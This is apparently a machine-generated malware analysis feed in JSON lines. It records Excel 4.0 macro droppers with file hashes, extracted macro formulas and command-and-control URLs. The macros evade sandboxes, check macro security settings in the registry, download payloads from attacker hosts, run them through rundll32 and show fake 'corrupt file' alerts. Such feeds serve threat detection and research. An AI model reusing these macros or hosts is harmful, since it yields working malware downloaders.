Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oc2HRHKGeR\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88412daac29e704b20e058dec52b0e158260381c8f4eec3e310d5016f4b5556f"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"88412daac29e704b20e058dec52b0e158260381c8f4eec3e310d5016f4b5556f","filesize":185344,"md5":"ebab0dc8f6133b4abf427500ac5a3645","sha1":"30d4c644f922cdfc0fc67f17d28a4b52f4549219","sha256":"88412daac29e704b20e058dec52b0e158260381c8f4eec3e310d5016f4b5556f","sha512":"c46af98c0728a55afcdc64828c0e20e3ad237cf2b6bb89a473a53a0c180de6587b69a9dcbfe9ff4a658273437b01d1fed9a982ae1d8c28a25f3f8df99775ba6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88412daac29e704b20e058dec52b0e158260381c8f4eec3e310d5016f4b5556f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88447a84c767787201283598b695826cb1a961df5f65cfcceee831d6086ed19e"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"88447a84c767787201283598b695826cb1a961df5f65cfcceee831d6086ed19e","filesize":209408,"md5":"4eda905c1f716d8493f79c3200557334","sha1":"f31e6fa84f2242942ce25fe5b0718910382be3cd","sha256":"88447a84c767787201283598b695826cb1a961df5f65cfcceee831d6086ed19e","sha512":"d588b978a0aa95a4141e667ca8f16c3cb328f5639fbcafd93d6255d82c682a2e1e8be1079cdf56a23b03872fddc4f4df88977aa52243b481f6252d622f9d6892","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88447a84c767787201283598b695826cb1a961df5f65cfcceee831d6086ed19e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LyMJrFyja3\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"884d0fe8da122a6ee71c6cd4d782e7318feb5bedc811808df4769eaaf70df292"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"884d0fe8da122a6ee71c6cd4d782e7318feb5bedc811808df4769eaaf70df292","filesize":168960,"md5":"c8cf40f7502c6174268e6ccff419e3c8","sha1":"90b8184c11c41eac362c2d0d59f5d82990a32917","sha256":"884d0fe8da122a6ee71c6cd4d782e7318feb5bedc811808df4769eaaf70df292","sha512":"89493481686df3b363b77efd90333fe99dcbd7207f843fdcf404ad4dffe47dd160bc8d16be66cb0452b0c1f83b191091844932b67a223e7b8af3e3a64ffbe2cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"884d0fe8da122a6ee71c6cd4d782e7318feb5bedc811808df4769eaaf70df292.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nfdZsyu7Bg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"885dbb11b66e32a09d2b1923efd14400a5d9281d25d3bb4c4bab7c80c63b4787"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"885dbb11b66e32a09d2b1923efd14400a5d9281d25d3bb4c4bab7c80c63b4787","filesize":168448,"md5":"27eb4e12c653182e0c58321e4cfaaaac","sha1":"0e914b7c604c9d8804880c71abe8ae2d97459705","sha256":"885dbb11b66e32a09d2b1923efd14400a5d9281d25d3bb4c4bab7c80c63b4787","sha512":"d1ece81ce6f9a828b6d29a51a54971ac380cc8b8e071f4f757eec1cc5d2b2d9501d7ba56e2951b887d79e41ec142edf47339b0a1600fda34f7a161fbe589afd0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"885dbb11b66e32a09d2b1923efd14400a5d9281d25d3bb4c4bab7c80c63b4787.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QwOTWu1Pzw\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"887c8efc4cb1b15f52cccda3540ff7c37f8f288741d97642ff570dcbcbc072ab"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"887c8efc4cb1b15f52cccda3540ff7c37f8f288741d97642ff570dcbcbc072ab","filesize":152576,"md5":"0a4d5b39fd9f3098ba1bf4147631df55","sha1":"28948d2d6513d33c15cf342bf9937c58007f3dc9","sha256":"887c8efc4cb1b15f52cccda3540ff7c37f8f288741d97642ff570dcbcbc072ab","sha512":"550c0b7bcd032c12a3b9ebb9d07eac72401a5b7ac92b00e54f60e676704d2f409e8d86206f6e2722e90dc363397b314ba246bc39f73de14fb3321b78915b819c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"887c8efc4cb1b15f52cccda3540ff7c37f8f288741d97642ff570dcbcbc072ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uAbQNy60KM\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"888194954c9414a2ecad4683990528bb3280479b04a52100505053fb104fc591"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"888194954c9414a2ecad4683990528bb3280479b04a52100505053fb104fc591","filesize":142848,"md5":"0cfcdec17271dfee8bb804b846e6f333","sha1":"7950495ee97edb1caa42a034314d8f15be750c4f","sha256":"888194954c9414a2ecad4683990528bb3280479b04a52100505053fb104fc591","sha512":"ba39977a3277ab40da09378fcb0358f630f581be22addedfcbd40ebc965099dd915a437122ca61e9ff8a818dee766e56b105eddee88da3d23cae8c1367a8dede","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"888194954c9414a2ecad4683990528bb3280479b04a52100505053fb104fc591.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4zPyCIM9Cj\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"888ac21719a896cf4de6749944b7a291c532f1c73f2938c6122b941428dd3bbe"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"888ac21719a896cf4de6749944b7a291c532f1c73f2938c6122b941428dd3bbe","filesize":104448,"md5":"e60fec7b6524ffe17aab85d9db976717","sha1":"5ba1e530ca6ba84768b309ff64b4e6a0657aa238","sha256":"888ac21719a896cf4de6749944b7a291c532f1c73f2938c6122b941428dd3bbe","sha512":"487fd7a7f6a86b9415854069f157781c3a338ccd11658200985c2249f57700cc120ddce739fbed69b0528903cd84351fdb9e520dfb459ac58218255dedeaac15","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"888ac21719a896cf4de6749944b7a291c532f1c73f2938c6122b941428dd3bbe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"oF12SwZ2aP\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8891aed840677c1a9e960e043a53723a4188076c966b4b99285d9c419490fd29"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"8891aed840677c1a9e960e043a53723a4188076c966b4b99285d9c419490fd29","filesize":170496,"md5":"6e61982fc47207a321ebda700ea75c99","sha1":"1c89127ddddf30bc92e30f7b05fb34ba0e235137","sha256":"8891aed840677c1a9e960e043a53723a4188076c966b4b99285d9c419490fd29","sha512":"e831faa921042c70b6a44275ffaed25ee4d5dcf8a044de30787825631dc93eb45af03e271a19a9f9081b47c2dd6b4e3dcd08a672eff783e0c01ca366fdc08204","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8891aed840677c1a9e960e043a53723a4188076c966b4b99285d9c419490fd29.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RUT3H3q5T3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"889a2d77eeb14a6f1273c5c6d2544a56f40835be94925be4edc57ed95a0849e6"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"889a2d77eeb14a6f1273c5c6d2544a56f40835be94925be4edc57ed95a0849e6","filesize":221184,"md5":"025474c450132830467546daa0bf7cec","sha1":"06d91b30200f492c1fe45f9ce6b389bdc5d5f200","sha256":"889a2d77eeb14a6f1273c5c6d2544a56f40835be94925be4edc57ed95a0849e6","sha512":"922382114d3f2ba110cfbadbd9ec4e18d2eced574deaef4b11fa7348d442922d8439950022bc2f60123657aefb751995e02687c124f57e6fe45645fd0e634052","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"889a2d77eeb14a6f1273c5c6d2544a56f40835be94925be4edc57ed95a0849e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0WC9rjvzEf\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88c45c71e5e38e9a401d3878ada7d00c28e548982add440f797b282a895eeefb"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"88c45c71e5e38e9a401d3878ada7d00c28e548982add440f797b282a895eeefb","filesize":103941,"md5":"291e3c5532eb72c947601325f3ee0279","sha1":"85e52f7846cfda070084797a32292215800cf042","sha256":"88c45c71e5e38e9a401d3878ada7d00c28e548982add440f797b282a895eeefb","sha512":"993a545908a9c8464d3d22085c0b12891e107c67900306ab4d5b6606ffe78d88d27c0b37d390ab99f9df6ac43f8f2b8a1d3740e48fedb70ec763d25ff59ce3c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88c45c71e5e38e9a401d3878ada7d00c28e548982add440f797b282a895eeefb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88c65b3732e19a97e618bbb64fca35a5064d1472ab3732240fcf1c963d96fcd3"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"88c65b3732e19a97e618bbb64fca35a5064d1472ab3732240fcf1c963d96fcd3","filesize":152576,"md5":"0e9e20a843becf8504cecca49a607605","sha1":"df693d3f92030a0ad0182567c704023f9a4846fa","sha256":"88c65b3732e19a97e618bbb64fca35a5064d1472ab3732240fcf1c963d96fcd3","sha512":"a41e8160b358fb85377f28e2d6bf1869ab488651e577604c3254ae2f401d55950bfcf49b0b439245d260591044bbb4ae7f8ebd095b9f0b292734d333bf9d3e1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88c65b3732e19a97e618bbb64fca35a5064d1472ab3732240fcf1c963d96fcd3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"idVyKAMYXn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88e526a420ed903c6e08038cd7219fb575be887aef0fa43f114f30621a08ca52"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"88e526a420ed903c6e08038cd7219fb575be887aef0fa43f114f30621a08ca52","filesize":225280,"md5":"cd29ea8e01efe93c503b6a777b889327","sha1":"4a9c962a06d1a719763efd82e17e7b98c4cb7720","sha256":"88e526a420ed903c6e08038cd7219fb575be887aef0fa43f114f30621a08ca52","sha512":"51418be878d38047942c687a9481e954b38d4ed1b5b7dabadd815a2b5ce0dcf0a0a88e53161e97a26d8e38c1acadc54f279574c5b3ee67e4622f861e6eb76c80","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88e526a420ed903c6e08038cd7219fb575be887aef0fa43f114f30621a08ca52.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EuzW43rhWU\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88f9f2fcbf12984d1f6bff939d25550c2b4b89dc514fa177ad01382469ff8be7"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"88f9f2fcbf12984d1f6bff939d25550c2b4b89dc514fa177ad01382469ff8be7","filesize":141312,"md5":"0ce993acad8547e5784b906c27dcdc9f","sha1":"b76b4c9a63180176dfebd300c8d66044f367ec07","sha256":"88f9f2fcbf12984d1f6bff939d25550c2b4b89dc514fa177ad01382469ff8be7","sha512":"06fb263ee09831534532d3e4a41f8be043d82ff7eed3008956ed035c6a8ecdc6540575021b2b47c9f1f20ac4a0900b06ce9ed64d022d0031af2ec7745dcefd3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88f9f2fcbf12984d1f6bff939d25550c2b4b89dc514fa177ad01382469ff8be7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"ea1DypsJXb\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"890da5ae9df7d60689f2f63c6cf9e35b95ce48c6515139bf603646a94272ba2c"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"890da5ae9df7d60689f2f63c6cf9e35b95ce48c6515139bf603646a94272ba2c","filesize":116224,"md5":"8e688a50b9eee43d8470a5ed5e0045b2","sha1":"4b93b14e105c4381794d1e6d4c37cae15167b4b0","sha256":"890da5ae9df7d60689f2f63c6cf9e35b95ce48c6515139bf603646a94272ba2c","sha512":"969d5d9f728f5c99a72039594ff8fbef148cfa400e1c577b914a19e94ad81109886f74a8c470a5952171b8a777bc499515de08f9c2d566087d63637ce9367702","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"890da5ae9df7d60689f2f63c6cf9e35b95ce48c6515139bf603646a94272ba2c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Fpab1es5VW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89110083ad00de66a4aa3d0d5e732f13d2b5e5d4402b09689c36c7bbc02fa46e"},"analysis":{"reported":"2020-04-09T16:17:30Z","score":10},"files":[{"filename":"89110083ad00de66a4aa3d0d5e732f13d2b5e5d4402b09689c36c7bbc02fa46e","filesize":152576,"md5":"3a26a02440b072ae3067bdf6dd0de0b8","sha1":"bcb66b4c505df8fcd52edb8e62ffc998e74b237f","sha256":"89110083ad00de66a4aa3d0d5e732f13d2b5e5d4402b09689c36c7bbc02fa46e","sha512":"bb0e45fc37fab5aabddbbce804bca55ad2f863da57f5e0c1236d0a69a696c8780c32d486f99862ed527c8d6a0c5a73c8cfff402a725de5523e8847d651544934","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89110083ad00de66a4aa3d0d5e732f13d2b5e5d4402b09689c36c7bbc02fa46e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 